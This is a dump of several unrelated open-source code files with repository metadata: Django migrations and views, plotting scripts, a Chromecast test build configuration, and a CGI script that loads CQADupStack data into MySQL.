if msg_type == self.msg_types['FILE']:
return msg_type + form(fname, self.FNAME_SIZE_LEN) + form(data, self.DATA_SIZE_LEN, to_encode=False)
elif msg_type in [self.msg_types[x] for x in ['FILE_PROPOSE', 'FILE_ACK', 'FILE_NAK', 'FILE_END']]:
return msg_type + form(fname, self.FNAME_SIZE_LEN)
elif msg_type == self.msg_types['MSG']:
return msg_type + form(data, self.MSG_SIZE_LEN)
else:
raise ValueError('Unknown message format. at app_layer.form_message')
def _deform_message(self, message):
"""
Извлечение полезной информации из сообщения
:param message: исходное сообщение, полученное процедурой _form_message
:return: словарь с полями: msg_type - тип сообщения
fname - название файла (опционально)
data - данные файла (опционально)
msg - содержимое сообщения из чата (опционально)
"""
msg_type = message[0:self.MSG_TYPE_LEN]
def parse(data, bytes_size_len, to_decode=True):
if not data:
raise ValueError("No data in parse function. Message is {}".format(message))
data_len = int.from_bytes(data[0:bytes_size_len], 'big')
parsed_data = data[bytes_size_len:data_len+bytes_size_len]
parsed_data = parsed_data.decode() if to_decode else parsed_data
return data_len+bytes_size_len, parsed_data
result = {'msg_type': msg_type}
if msg_type == self.msg_types['FILE']:
fname_size, fname = parse(message[self.MSG_TYPE_LEN:], self.FNAME_SIZE_LEN)
result['fname'] = fname
result['data'] = parse(message[self.MSG_TYPE_LEN+fname_size:], self.DATA_SIZE_LEN, to_decode=False)[1]
elif msg_type in [self.msg_types[x] for x in ['FILE_PROPOSE', 'FILE_ACK', 'FILE_NAK', 'FILE_END']]:
result['fname'] = parse(message[self.MSG_TYPE_LEN:], self.FNAME_SIZE_LEN)[1]
elif msg_type == self.msg_types['MSG']:
result['msg'] = parse(message[self.MSG_TYPE_LEN:], self.MSG_SIZE_LEN)[1]
else:
raise ValueError('Unknown message type at app_layer.deform_message - {}\n'
'message is {}'.format(msg_type, message))
return result
class FileNotAcknowledged(Exception):
"""
Особое исключение, если собеседник из чата отказывается принимать файл.
Используется для передачи этой информации в интерфейс программы.
"""
def __init__(self, message):
self.message = message
class FileProposal(Exception):
"""
Особое исключение, если собеседник из чата предлагает получить файл.
Используется для передачи этой информации в интерфейс программы.
"""
def __init__(self, message):
self.message = message
class FailedSend(Exception):
def __init__(self, message):
self.message = message
|
[
"svetlanazlobina97@gmail.com"
] |
svetlanazlobina97@gmail.com
|
f4a6c25493802d58f7b8566037d5f228f52ef6bb
|
546e6b1e2d0a3dd68f4bd3aaedde96e1ecbd94ad
|
/linkkısalt/linkler/migrations/0002_auto_20180316_1550.py
|
7d47d0c62f9310aedf1ce09bbc589be4f3919b9b
|
[] |
no_license
|
rifatalptekincetin/Django-Pyton
|
3d804fc72fc75ff163b9d8a26de16eae1a27e2f8
|
e3c640e7ae2141f7047fb2d2b78eaea11db332f1
|
refs/heads/master
| 2020-03-30T13:31:33.212545
| 2018-10-02T15:43:06
| 2018-10-02T15:43:06
| 151,275,940
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 2.0.3 on 2018-03-16 12:50
from django.db import migrations, models
import linkler.models
class Migration(migrations.Migration):
dependencies = [
('linkler', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='link',
name='resim',
field=models.ImageField(blank=True, null=True, upload_to=linkler.models.link.save_path),
),
]
|
[
"34903387+rifatalptekincetin@users.noreply.github.com"
] |
34903387+rifatalptekincetin@users.noreply.github.com
|
9cdabaefe72d4543bfcca8e1713f3cb72e6a627c
|
6a7506417addcbba2c05bb979f79c5c7c495345c
|
/gbbo/plotter.py
|
a9cdaa2bab995bc3f187666f423e4a51c10c9ac3
|
[] |
no_license
|
charles-uno/charlesplotlib
|
0254a392afc45c9ea5b8b81e2afb479daecbf96f
|
f556191a70e795b2dcf266737be01a272e915730
|
refs/heads/master
| 2021-09-24T19:59:15.540743
| 2018-10-13T19:39:43
| 2018-10-13T19:39:43
| 56,997,117
| 0
| 1
| null | 2017-04-08T17:26:05
| 2016-04-24T22:21:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
#!/usr/bin/env python3
# ######################################################################
import matplotlib.pyplot as plt
# ######################################################################
def main():
data = load_season(3)
for name, scores in data.items():
print(name, '\t', scores)
for name, scores in data.items():
xvals = range(1, len(scores)+1)
plt.plot(xvals, scores, label=name)
plt.axis([0, 12, 0, 12])
plt.show()
return
# ######################################################################
def load_season(n):
scores = {}
for line in read('s' + str(n) + '.txt'):
# Skip spacer lines. We don't need to explicitly track episodes,
# since each baker appears exactly once in each.
if not line:
continue
name, score = line.split()
if name not in scores:
scores[name] = []
scores[name].append( int(score) )
return scores
# ----------------------------------------------------------------------
def read(filename):
with open(filename, 'r') as handle:
return [ x.rstrip() for x in handle ]
# ######################################################################
if __name__ == '__main__':
main()
|
[
"charles.a.mceachern@gmail.com"
] |
charles.a.mceachern@gmail.com
|
902c325a21f27a1be1fec85aa1dacea4b01bb3aa
|
010d64e4905a2dc16f7786b0c3ee6ae968b812b5
|
/experiment.py
|
1f44ea683d9d3e2691888879bb0569b9da37f216
|
[] |
no_license
|
jimmymenzies/aviation_dosimetry
|
af4e72bf2b5bd0447f02171c9a36f965f855b6a6
|
06ad06ecb6b800b9b976501d88b5273aa503cd63
|
refs/heads/master
| 2020-07-31T06:09:39.561259
| 2019-10-28T01:10:29
| 2019-10-28T01:10:29
| 210,511,214
| 0
| 1
| null | 2021-05-18T21:24:16
| 2019-09-24T04:23:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,970
|
py
|
import matplotlib.pyplot as plt
import pandas as pd
import requests
df = pd.read_csv("experiment.csv", skiprows=1, header=None)
df.columns = ["time", "dose", "altitude"]
latitude = -33.51 #(S) [-90, 90] degrees N is +ve
longitude = 147.24 #(E) [-180, 180] degrees E is +ve
year = '2015'
month = '7'
day = '19'
def get_api_data(particle, api):
url = "http://cosmicrays.amentum.space/" + api + "/ambient_dose"
values = []
for alt in df['altitude'] :
parameters = {
"altitude" : alt, #km
"latitude" : -33.51, #degrees (N)
"longitude" : 147.24, #degrees (E)
"year" : 2015,
"month" : 7,
"day" : 19,
"utc" : 10,
"particle" : particle
}
if particle == "gamma" and api == "cari7":
parameters["particle"] = "photon"
response = requests.get(url, params=parameters)
dose_rate = response.json()
dose_rate_val = dose_rate['dose rate']['value']
values.append(dose_rate_val)
return values
fig = plt.figure()
axes = fig.add_subplot(111)
axes.plot(
df['time'], df['dose'],
label="Experiment", linestyle="None", marker="x")
values = get_api_data("gamma", "parma")
axes.plot(
df['time'], values,
label="PARMA_g", linestyle="None", marker="x", color="red")
values = get_api_data("total", "parma")
axes.plot(
df['time'], values,
label="PARMA_t", linestyle="None", marker="+", color="red")
values = get_api_data("gamma", "cari7")
axes.plot(
df['time'], values,
label="CARI-7_g", linestyle="None", marker="x", color="blue")
values = get_api_data("total", "cari7")
axes.plot(
df['time'], values,
label="CARI-7_t", linestyle="None", marker="+", color="blue")
axes.set_xlim(left=0)
axes.set_ylim(bottom=0)
axes.set_xlabel("Time, s")
axes.set_ylabel("Doses, uSv")
plt.legend(loc="upper left")
#plt.show()
plt.savefig("lineplot.png")
|
[
"simmymenzies@gmail.com"
] |
simmymenzies@gmail.com
|
c46166ba76796d3e3bf7d72646fe57fbae97da09
|
496959e6ff3ab72875d70ceec9af1d15e9919020
|
/tests/test_scottbrian_secdata/__init__.py
|
1370a3d53341fd1193a01c538ed9cab096ceff1a
|
[
"MIT"
] |
permissive
|
ScottBrian/scottbrian_secdata
|
9990699181705c8612650697b9cf2d055df69723
|
ba1b4eead10d2f178a173f1ca9fdbb78ceb54c8d
|
refs/heads/master
| 2023-04-18T06:36:48.232821
| 2021-05-04T03:28:38
| 2021-05-04T03:28:38
| 364,025,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39
|
py
|
"""scottbrian_secdata test package."""
|
[
"12262512+ScottBrian@users.noreply.github.com"
] |
12262512+ScottBrian@users.noreply.github.com
|
089b43912c11374963f18cecdcb6edc51f2864c7
|
d5fab5f279eac9a0ee6d675c458d5dc6aad0adcf
|
/app/accounts/migrations/0008_auto_20190422_1933.py
|
ffd118a4f1441135d7215482fb3ef425dfc3209c
|
[] |
no_license
|
JeffMcCracken/new-music-app
|
66a9913a39f1ccf7b67475eff17fb82036733b98
|
3091b38b9cc511a652b45f02839adb558b46ffee
|
refs/heads/master
| 2020-04-24T23:29:39.867786
| 2019-04-22T20:21:57
| 2019-04-22T20:21:57
| 172,346,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# Generated by Django 2.2 on 2019-04-22 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0007_auto_20190422_1901'),
]
operations = [
migrations.RemoveField(
model_name='album',
name='album_art',
),
migrations.AddField(
model_name='album',
name='art_large',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='album',
name='art_medium',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
migrations.AddField(
model_name='album',
name='art_small',
field=models.CharField(default='asdfasdf', max_length=255),
preserve_default=False,
),
]
|
[
"jeffmccracken12@gmail.com"
] |
jeffmccracken12@gmail.com
|
42b7e8840057bf9fac0befe7e09bf2123a0eaf04
|
154ad9b7b26b5c52536bbd83cdaf0a359e6125c3
|
/chromecast/chromecast_tests.gypi
|
cac841a18984ec9281897b8b31e6d17b330530c6
|
[
"BSD-3-Clause"
] |
permissive
|
bopopescu/jstrace
|
6cc239d57e3a954295b67fa6b8875aabeb64f3e2
|
2069a7b0a2e507a07cd9aacec4d9290a3178b815
|
refs/heads/master
| 2021-06-14T09:08:34.738245
| 2017-05-03T23:17:06
| 2017-05-03T23:17:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,722
|
gypi
|
# Copyright (c) 2014 Google Inc. All Rights Reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'use_alsa%': 0,
},
'targets': [
{
'target_name': 'cast_base_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_base',
'cast_component',
'cast_crypto',
'../base/base.gyp:run_all_unittests',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
],
'sources': [
'base/bind_to_task_runner_unittest.cc',
'base/chromecast_switches_unittest.cc',
'base/component/component_unittest.cc',
'base/device_capabilities_impl_unittest.cc',
'base/error_codes_unittest.cc',
'base/path_utils_unittest.cc',
'base/process_utils_unittest.cc',
'base/serializers_unittest.cc',
'base/system_time_change_notifier_unittest.cc',
'crypto/signature_cache_unittest.cc',
],
'conditions': [
['OS == "android"', {
'dependencies': [
'<(DEPTH)/testing/android/native_test.gyp:native_test_native_code',
],
}],
],
}, # end of cast_base_unittests
{
'target_name': 'cast_crash_test_support',
'type': '<(component)',
'dependencies': [
'cast_base',
'cast_crash',
],
'sources': [
'crash/linux/crash_testing_utils.cc',
'crash/linux/crash_testing_utils.h',
],
}, # end of target 'cast_crash_test_support'
{
'target_name': 'cast_crash_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_crash',
'cast_crash_test_support',
'../base/base.gyp:run_all_unittests',
'../testing/gmock.gyp:gmock',
'../testing/gtest.gyp:gtest',
],
'include_dirs': [
'../breakpad/src',
],
'sources': [
'crash/cast_crashdump_uploader_unittest.cc',
'crash/linux/dummy_minidump_generator_unittest.cc',
'crash/linux/dump_info_unittest.cc',
'crash/linux/synchronized_minidump_manager_unittest.cc',
'crash/linux/minidump_writer_unittest.cc',
],
'conditions': [
['OS == "android"', {
'dependencies': [
'<(DEPTH)/testing/android/native_test.gyp:native_test_native_code',
],
}],
],
}, # end of cast_crash_unittests
{
'target_name': 'cast_tests',
'type': 'none',
'dependencies': [
'cast_test_generator',
],
'conditions': [
['chromecast_branding!="public"', {
'dependencies': [
'internal/chromecast_internal.gyp:cast_tests_internal',
],
}],
],
},
# This target only depends on targets that generate test binaries.
{
'target_name': 'cast_test_generator',
'type': 'none',
'dependencies': [
'cast_base_unittests',
'../base/base.gyp:base_unittests',
'../content/content_shell_and_tests.gyp:content_unittests',
'../crypto/crypto.gyp:crypto_unittests',
'../ipc/ipc.gyp:ipc_tests',
'../jingle/jingle.gyp:jingle_unittests',
'../media/media.gyp:media_unittests',
'../media/midi/midi.gyp:midi_unittests',
'../net/net.gyp:net_unittests',
'../ppapi/ppapi_internal.gyp:ppapi_unittests',
'../sandbox/sandbox.gyp:sandbox_linux_unittests',
'../sql/sql.gyp:sql_unittests',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation_unittests',
'../ui/base/ui_base_tests.gyp:ui_base_unittests',
'../url/url.gyp:url_unittests',
],
'conditions': [
['OS=="linux" and is_cast_desktop_build==0', {
'variables': {
'filters': [
# Run net_unittests first to avoid random failures due to slow python startup
# KeygenHandlerTest.SmokeTest and KeygenHandlerTest.ConcurrencyTest fail due to
# readonly certdb (b/8153161)
# URLRequestTestHTTP.GetTest_ManyCookies takes roughly 55s to run. Increase
# timeout to 90s from 45s to allow it to pass (b/19821476)
# ProxyScriptFetcherImplTest.HttpMimeType is flaking (b/19848784)
# Running a batch of net_unittests has high overhead. Run tests in batches of 25 to reduce number of batches (b/23156294).
'net_unittests --gtest_filter=-KeygenHandlerTest.SmokeTest:KeygenHandlerTest.ConcurrencyTest:ProxyScriptFetcherImplTest.HttpMimeType --test-launcher-timeout=90000 --test-launcher-batch-limit=25',
# Disable ProcessMetricsTest.GetNumberOfThreads (b/15610509)
# Disable ProcessUtilTest.* (need to define OS_ANDROID)
# Disable StackContainer.BufferAlignment (don't support 16-byte alignment)
# Disable SystemMetrics2Test.GetSystemMemoryInfo (buffers>0 can't be guaranteed)
'base_unittests --gtest_filter=-ProcessMetricsTest.GetNumberOfThreads:ProcessUtilTest.*:StackContainer.BufferAlignment:SystemMetrics2Test.GetSystemMemoryInfo',
# DesktopCaptureDeviceTest.*: No capture device on Eureka
# Disable PepperGamepadHostTest.WaitForReply (pepper not supported on Eureka)
# Disable GpuDataManagerImplPrivateTest.SetGLStrings and
# RenderWidgetHostTest.Background because we disable the blacklist to enable WebGL (b/16142554)
'content_unittests --gtest_filter=-DOMStorageDatabaseTest.TestCanOpenAndReadWebCoreDatabase:DesktopCaptureDeviceTest.Capture:GamepadProviderTest.PollingAccess:GpuDataManagerImplPrivateTest.SetGLStrings:PepperGamepadHostTest.WaitForReply:RenderWidgetHostTest.Background',
# Disable VP9 related tests (b/18593324)
# PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM
# PipelineIntegrationTest.BasicPlayback_VideoOnly_VP9_WebM
# PipelineIntegrationTest.BasicPlayback_VP9*
# PipelineIntegrationTest.P444_VP9_WebM
# Disable VP8A tests (b/18593324)
# PipelineIntegrationTest.BasicPlayback_VP8A*
# Disable OpusAudioDecoderTest/AudioDecoderTest.ProduceAudioSamples/0 (unit
# test fails when Opus decoder uses fixed-point)
# Due to b/16456550, disable the following four test cases:
# AudioOutputControllerTest.PlayDivertSwitchDeviceRevertClose
# AudioOutputControllerTest.PlaySwitchDeviceClose
# AudioStreamHandlerTest.Play
# SoundsManagerTest.Play
# Disable AudioStreamHandlerTest.ConsecutivePlayRequests (b/16539293)
'media_unittests --gtest_filter=-AudioOutputControllerTest.PlayDivertSwitchDeviceRevertClose:AudioOutputControllerTest.PlaySwitchDeviceClose:AudioStreamHandlerTest.Play:AudioStreamHandlerTest.ConsecutivePlayRequests:PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VideoOnly_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VP9*:PipelineIntegrationTest.P444_VP9_WebM:PipelineIntegrationTest.BasicPlayback_VP8A*:OpusAudioDecoderTest/AudioDecoderTest.ProduceAudioSamples/0:SoundsManagerTest.Play',
# DoAppendUTF8Invalid fails because of dcheck_always_on flag in Eng builds
'url_unittests --gtest_filter=-URLCanonTest.DoAppendUTF8Invalid',
],
},
}, { # else desktop or android
'variables': {
'filters': [
# Disable PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM (not supported)
'media_unittests --gtest_filter=-PipelineIntegrationTest.BasicPlayback_MediaSource_VP9_WebM',
],
}
}],
['OS=="linux"', {
'dependencies': [
'cast_crash_unittests',
],
}],
['disable_display==0', {
'dependencies': [
'../gpu/gpu.gyp:gpu_unittests',
],
}],
['OS!="android"', {
'dependencies': [
'cast_shell_unittests',
'cast_shell_browser_test',
'media/media.gyp:cast_media_unittests',
],
'variables': {
'filters': [
# --enable-local-file-accesses => to load sample media files
# --test-launcher-jobs=1 => so internal code can bind to port
'cast_shell_browser_test --no-sandbox --enable-local-file-accesses --enable-cma-media-pipeline --ozone-platform=cast --test-launcher-jobs=1',
'cast_media_unittests --test-launcher-jobs=1',
],
},
'conditions': [
['use_alsa==1', {
'dependencies': [
'media/media.gyp:cast_alsa_cma_backend_unittests',
],
}],
],
}],
],
'includes': ['build/tests/test_list.gypi'],
},
{
'target_name': 'cast_metrics_test_support',
'type': '<(component)',
'dependencies': [
'cast_base',
],
'sources': [
'base/metrics/cast_metrics_test_helper.cc',
'base/metrics/cast_metrics_test_helper.h',
],
}, # end of target 'cast_metrics_test_support'
], # end of targets
'conditions': [
['OS=="android"', {
'targets': [
{
'target_name': 'cast_base_unittests_apk',
'type': 'none',
'dependencies': [
'cast_base_unittests',
],
'variables': {
'test_suite_name': 'cast_base_unittests',
},
'includes': ['../build/apk_test.gypi'],
}, # end of target 'cast_base_unittests_apk'
{
'target_name': 'cast_android_tests',
'type': 'none',
'dependencies': ['cast_android_tests_generator'],
'conditions': [
['chromecast_branding!="public"', {
'dependencies': [
'internal/chromecast_internal.gyp:cast_android_tests_internal',
],
}],
],
}, # end of target 'cast_android_tests',
{
'target_name': 'cast_android_tests_generator',
'type': 'none',
'variables': {
'filters': [
# ComponentDeathTest is unable to fork processes on Android
'cast_base_unittests_apk --gtest_filter=*:-ComponentDeathTest.*',
# LayerTreeHost has dozens of separate crashing test cases on Fugu. (b/22512618)
'cc_unittests_apk --gtest_filter=*:-LayerTreeHost*',
# The following tests all crash on fugu.
'gfx_unittests_apk --gtest_filter=*:-FontListTest.Fonts_DeriveWithHeightUpperBound',
'media_unittests_apk --gtest_filter=*-AudioInputTest.*:AudioAndroidInputTest*',
],
},
'dependencies': [
'cast_base_unittests_apk',
'../base/base.gyp:base_unittests_apk',
'../cc/cc_tests.gyp:cc_unittests_apk',
'../ipc/ipc.gyp:ipc_tests_apk',
'../media/media.gyp:media_unittests_apk',
'../media/midi/midi.gyp:midi_unittests_apk',
'../net/net.gyp:net_unittests_apk',
'../sql/sql.gyp:sql_unittests_apk',
'../ui/events/events_unittests.gyp:events_unittests_apk',
'../ui/gfx/gfx_tests.gyp:gfx_unittests_apk',
],
'includes': ['build/tests/test_list.gypi'],
}, # end of target 'cast_android_tests_generator'
{
'target_name': 'cast_android_test_lists',
'type': 'none',
'dependencies': [
'cast_android_tests',
],
'variables': {
'test_generator_py': '<(DEPTH)/chromecast/tools/build/generate_test_lists.py',
'test_inputs_dir': '<(SHARED_INTERMEDIATE_DIR)/chromecast/tests',
},
'actions': [
{
'action_name': 'generate_combined_test_build_list',
'message': 'Generating combined test build list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/build_test_list_android.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_build',
],
},
{
'action_name': 'generate_combined_test_run_list',
'message': 'Generating combined test run list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/run_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_run',
],
}
],
},
], # end of targets
}, { # OS!="android"
'targets': [
# GN target: //chromecast/browser:test_support
{
'target_name': 'cast_shell_test_support',
'type': '<(component)',
'defines': [
'HAS_OUT_OF_PROC_TEST_RUNNER',
],
'dependencies': [
'cast_shell_core',
'../content/content_shell_and_tests.gyp:content_browser_test_base',
'../content/content_shell_and_tests.gyp:content_browser_test_support',
'../mojo/mojo_public.gyp:mojo_cpp_bindings',
'../testing/gtest.gyp:gtest',
],
'export_dependent_settings': [
'../content/content_shell_and_tests.gyp:content_browser_test_base',
],
'sources': [
'browser/test/chromecast_browser_test.cc',
'browser/test/chromecast_browser_test.h',
'browser/test/chromecast_browser_test_helper.h',
'browser/test/chromecast_browser_test_runner.cc',
],
}, # end of target 'cast_shell_test_support'
{
'target_name': 'cast_shell_browser_test',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_shell_test_support',
'../content/content_shell_and_tests.gyp:test_support_content',
'../media/media.gyp:media_test_support',
'../testing/gtest.gyp:gtest',
],
'defines': [
'HAS_OUT_OF_PROC_TEST_RUNNER',
],
'sources': [
'browser/test/chromecast_shell_browser_test.cc',
],
'conditions': [
['chromecast_branding=="public"', {
'dependencies': [
# Link default libcast_media_1.0 statically to prevent
# linking dynamically against dummy implementation.
'media/media.gyp:libcast_media_1.0_default_core',
],
'sources': [
'browser/test/chromecast_browser_test_helper_default.cc',
],
},{
'dependencies': [
'internal/chromecast_internal.gyp:cast_shell_browser_test_helper_internal',
],
}],
],
},
# GN target: //chromecast/app:cast_shell_unittests
{
'target_name': 'cast_shell_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'cast_crash_client',
'cast_crash_test_support',
'../base/base.gyp:run_all_unittests',
'../testing/gtest.gyp:gtest',
],
'sources': [
'app/linux/cast_crash_reporter_client_unittest.cc',
],
}, # end of cast_shell_unittests
# Builds all tests and the output lists of build/run targets for those tests.
# Note: producing a predetermined list of dependent inputs on which to
# regenerate this output is difficult with GYP. This file is not
# guaranteed to be regenerated outside of a clean build.
# GN target: //chromecast:cast_test_lists
{
'target_name': 'cast_test_lists',
'type': 'none',
'dependencies': [
'cast_tests',
],
'variables': {
'test_generator_py': '<(DEPTH)/chromecast/tools/build/generate_test_lists.py',
'test_inputs_dir': '<(SHARED_INTERMEDIATE_DIR)/chromecast/tests',
'test_additional_options': '--ozone-platform=headless'
},
'actions': [
{
'action_name': 'generate_combined_test_build_list',
'message': 'Generating combined test build list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/build_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'pack_build',
],
},
{
'action_name': 'generate_combined_test_run_list',
'message': 'Generating combined test run list',
'inputs': ['<(test_generator_py)'],
'outputs': ['<(PRODUCT_DIR)/tests/run_test_list.txt'],
'action': [
'python', '<(test_generator_py)',
'-t', '<(test_inputs_dir)',
'-o', '<@(_outputs)',
'-a', '<(test_additional_options)',
'pack_run',
],
}
],
},
], # end of targets
}],
], # end of conditions
}
|
[
"zzbthechaos@gmail.com"
] |
zzbthechaos@gmail.com
|
9a920a85204bde626db21838a35d3fc165f43fd6
|
bccb2cb00fecc24031e727a0ecbc246338d488eb
|
/softdesk/projects/urls.py
|
d626d5a3fe957659b1da54abdb0ca14ff8bde741
|
[] |
no_license
|
Arnaud290/OC_P10
|
03c8e85e8f89d7a32afea086b56adea34047ab53
|
fb22c9e8906d2b61e6fa575ea2e271933e19b2ca
|
refs/heads/master
| 2023-04-27T04:59:40.320393
| 2021-05-19T11:45:59
| 2021-05-19T11:45:59
| 361,775,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,032
|
py
|
"""Projects application url management module"""
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from projects import views
urlpatterns = [
path(
'',
views.ProjectList.as_view()
),
path(
'<int:pk>',
views.ProjectDetail.as_view()
),
path(
'<int:project_id>/users/',
views.ContributorList.as_view()
),
path(
'<int:project_id>/users/<int:pk>',
views.ContributorDelete.as_view()
),
path(
'<int:project_id>/issues/',
views.IssueList.as_view()
),
path(
'<int:project_id>/issues/<int:pk>',
views.IssueDetail.as_view()
),
path(
'<int:project_id>/issues/<int:issue_id>/comments/',
views.CommentList.as_view()
),
path(
'<int:project_id>/issues/<int:issue_id>/comments/<int:pk>',
views.CommentDetail.as_view()
),
]
urlpatterns = format_suffix_patterns(urlpatterns)
|
[
"arnaud.manach@gmail.com"
] |
arnaud.manach@gmail.com
|
531448f265fec95557c5fe380804ddd49560f57a
|
07add4cdb85d5bdbf5c5c3e716e0b1d4ceb3f152
|
/se-annotate/create_and_fill_databases.cgi
|
069b4cb76163c630c027d85c4d7668ad0e026f14
|
[] |
no_license
|
D1Doris/AnnotateCQADupStack
|
8c85db304930adbd5447303bde4a46eb3508732b
|
31323a45122f048377c72383bfe3a5125f76c365
|
refs/heads/master
| 2021-01-18T23:22:39.040909
| 2016-06-04T04:41:00
| 2016-06-04T04:41:00
| 55,202,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,768
|
cgi
|
#!/usr/bin/env python
import cgi
import os, glob, re, sys
import mysql.connector as conn
import query_cqadupstack_barebones as qse
def connectDB():
db = conn.connect(host="localhost", user="someuser", passwd="somepassword", port=3306)
cursor = db.cursor()
return db,cursor
def createDB(db, cursor, subforum):
sql = "create database " + subforum
cursor.execute(sql)
db.commit()
def createTables(db, cursor, subforum):
# Create one table for the posts
sql = "use " + subforum
cursor.execute(sql)
sql = '''create table posts
(postid int not null,
title varchar(150) not null,
body varchar(30000) not null,
primary key(postid))'''
cursor.execute(sql)
db.commit()
# Create one table for the demo user
sql = "use " + subforum
cursor.execute(sql)
sql = '''CREATE TABLE table_demo
(pairid INT NOT NULL AUTO_INCREMENT,
pair VARCHAR(15) NOT NULL,
pairtype VARCHAR(20) NOT NULL,
verdict VARCHAR(20),
primary key(pairid)
)'''
cursor.execute(sql)
db.commit()
# types should be one of 'transitive', 'fn' or 'transitive and fn'. At least at this stage.
def populateDB(db, cursor, subforum, zipdir, csvdir):
# First populate the posts table
forumfile = zipdir + '/' + subforum + '.zip'
o = qse.load_subforum(forumfile)
postids = o.get_all_postids()
totids = len(postids)
count = 1
for postid in postids:
if count % 10000 == 0:
print 'Added ' + str(count) + ' out of ' + str(totids) + ' posts to ' + subforum + ' database.'
title = o.url_cleaning(o.get_posttitle(postid))
body = o.url_cleaning(o.get_postbody(postid))
if not re.search('[A-Za-z0-9]', title) and not re.search('[A-Za-z0-9]', body):
print "WARNING: Empty title and body for post", postid
elif not re.search('[A-Za-z0-9]', title):
print "WARNING: Empty title for post", postid
elif not re.search('[A-Za-z0-9]', body):
print "WARNING: Empty body for post", postid
count += 1
sql = "INSERT INTO posts(postid,title,body) VALUES (%s, %s, %s)"
cursor.execute(sql, (postid, title, body))
db.commit()
print "Populated the posts table."
# Then fill the demo user's table
csvfile = csvdir + '/' + subforum + '_annotation_candidates.csv'
csv_open = open(csvfile, 'r')
csv = csv_open.readlines()
csv_open.close()
for row in csv:
row = row.strip()
cells = row.split('\t')
pairid = cells[0] + '-' + cells[1]
pairtype = cells[2]
sql = "INSERT INTO table_demo(pair,pairtype,verdict) VALUES (%s, %s, 'noverdict')"
cursor.execute(sql, (pairid, pairtype))
db.commit()
print "Filled table_demo table."
def usage():
usage_text = '''
This script can be used to create and fill a mysql database that's used for the annotation of CQADupStack data.
USAGE: ''' + os.path.basename(__file__) + ''' <zipdir>
<zipdir> is the directory with the CQADupStack .zip files.
This can be downloaded from http://nlp.cis.unimelb.edu.au/resources/cqadupstack/.
'''
print usage_text
sys.exit(' ')
if __name__ == "__main__":
if len(sys.argv[1:]) != 1:
usage()
else:
try:
zipdir = sys.argv[1]
csvdir = 'csv/'
annotationfiles = glob.glob(csvdir + '/*_annotation_candidates.csv')
for f in annotationfiles:
subforum = os.path.basename(f).split('_')[0]
db, cursor = connectDB()
createDB(db, cursor, subforum)
createTables(db, cursor, subforum)
populateDB(db, cursor, subforum, zipdir, csvdir)
print "Closing the connection..."
cursor.close()
except:
cgi.print_exception()
|
[
"hoogeveen@textkernel.nl"
] |
hoogeveen@textkernel.nl
|
62afbbf5d532f45a0bd8428e83ef55bf112e19de
|
66207c5881567f50cc30179cfe205a194212d4f1
|
/blog/views.py
|
2799d92590bfe37d27dd156142c8bcb9ea768996
|
[] |
no_license
|
6256163/Django_Blog
|
fe214a81f0231775a13e2e8ccbdbe8114cf3e0be
|
a20ae86f1728363b7a317723156f7c21ffa1c9d0
|
refs/heads/master
| 2020-05-21T17:49:11.113551
| 2016-12-14T04:17:02
| 2016-12-14T04:17:02
| 64,593,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,236
|
py
|
# coding=utf-8
from __future__ import unicode_literals
from copy import copy
import redis
from blog.permissions import IsOwnerOrReadOnly
from blog.serializers import BlogSerializer, ReplySerializer, ReplyInReplySerializer
from rest_framework import permissions, viewsets, renderers
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.reverse import reverse
from users.forms import RegisterForm
from .models import Blog, Reply, ReplyInReply
# Create your views here.
class BlogViewSet(viewsets.ModelViewSet):
"""
This viewset provides `list`, `create`, `retrieve`, `update` and `destroy` actions.
"""
queryset = Blog.objects.all()
serializer_class = BlogSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
renderer_classes = (renderers.TemplateHTMLRenderer, renderers.JSONRenderer,)
r = redis.StrictRedis(host='localhost', port=6379, db=0)
def perform_create(self, serializer):
serializer.save(user=self.request.user, latest_reply_user=self.request.user)
# 重写retrieve以适应分页需求
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer_blog = self.get_serializer(instance)
replies_queryset = Reply.objects.filter(blog=instance)
page = self.paginate_queryset(replies_queryset)
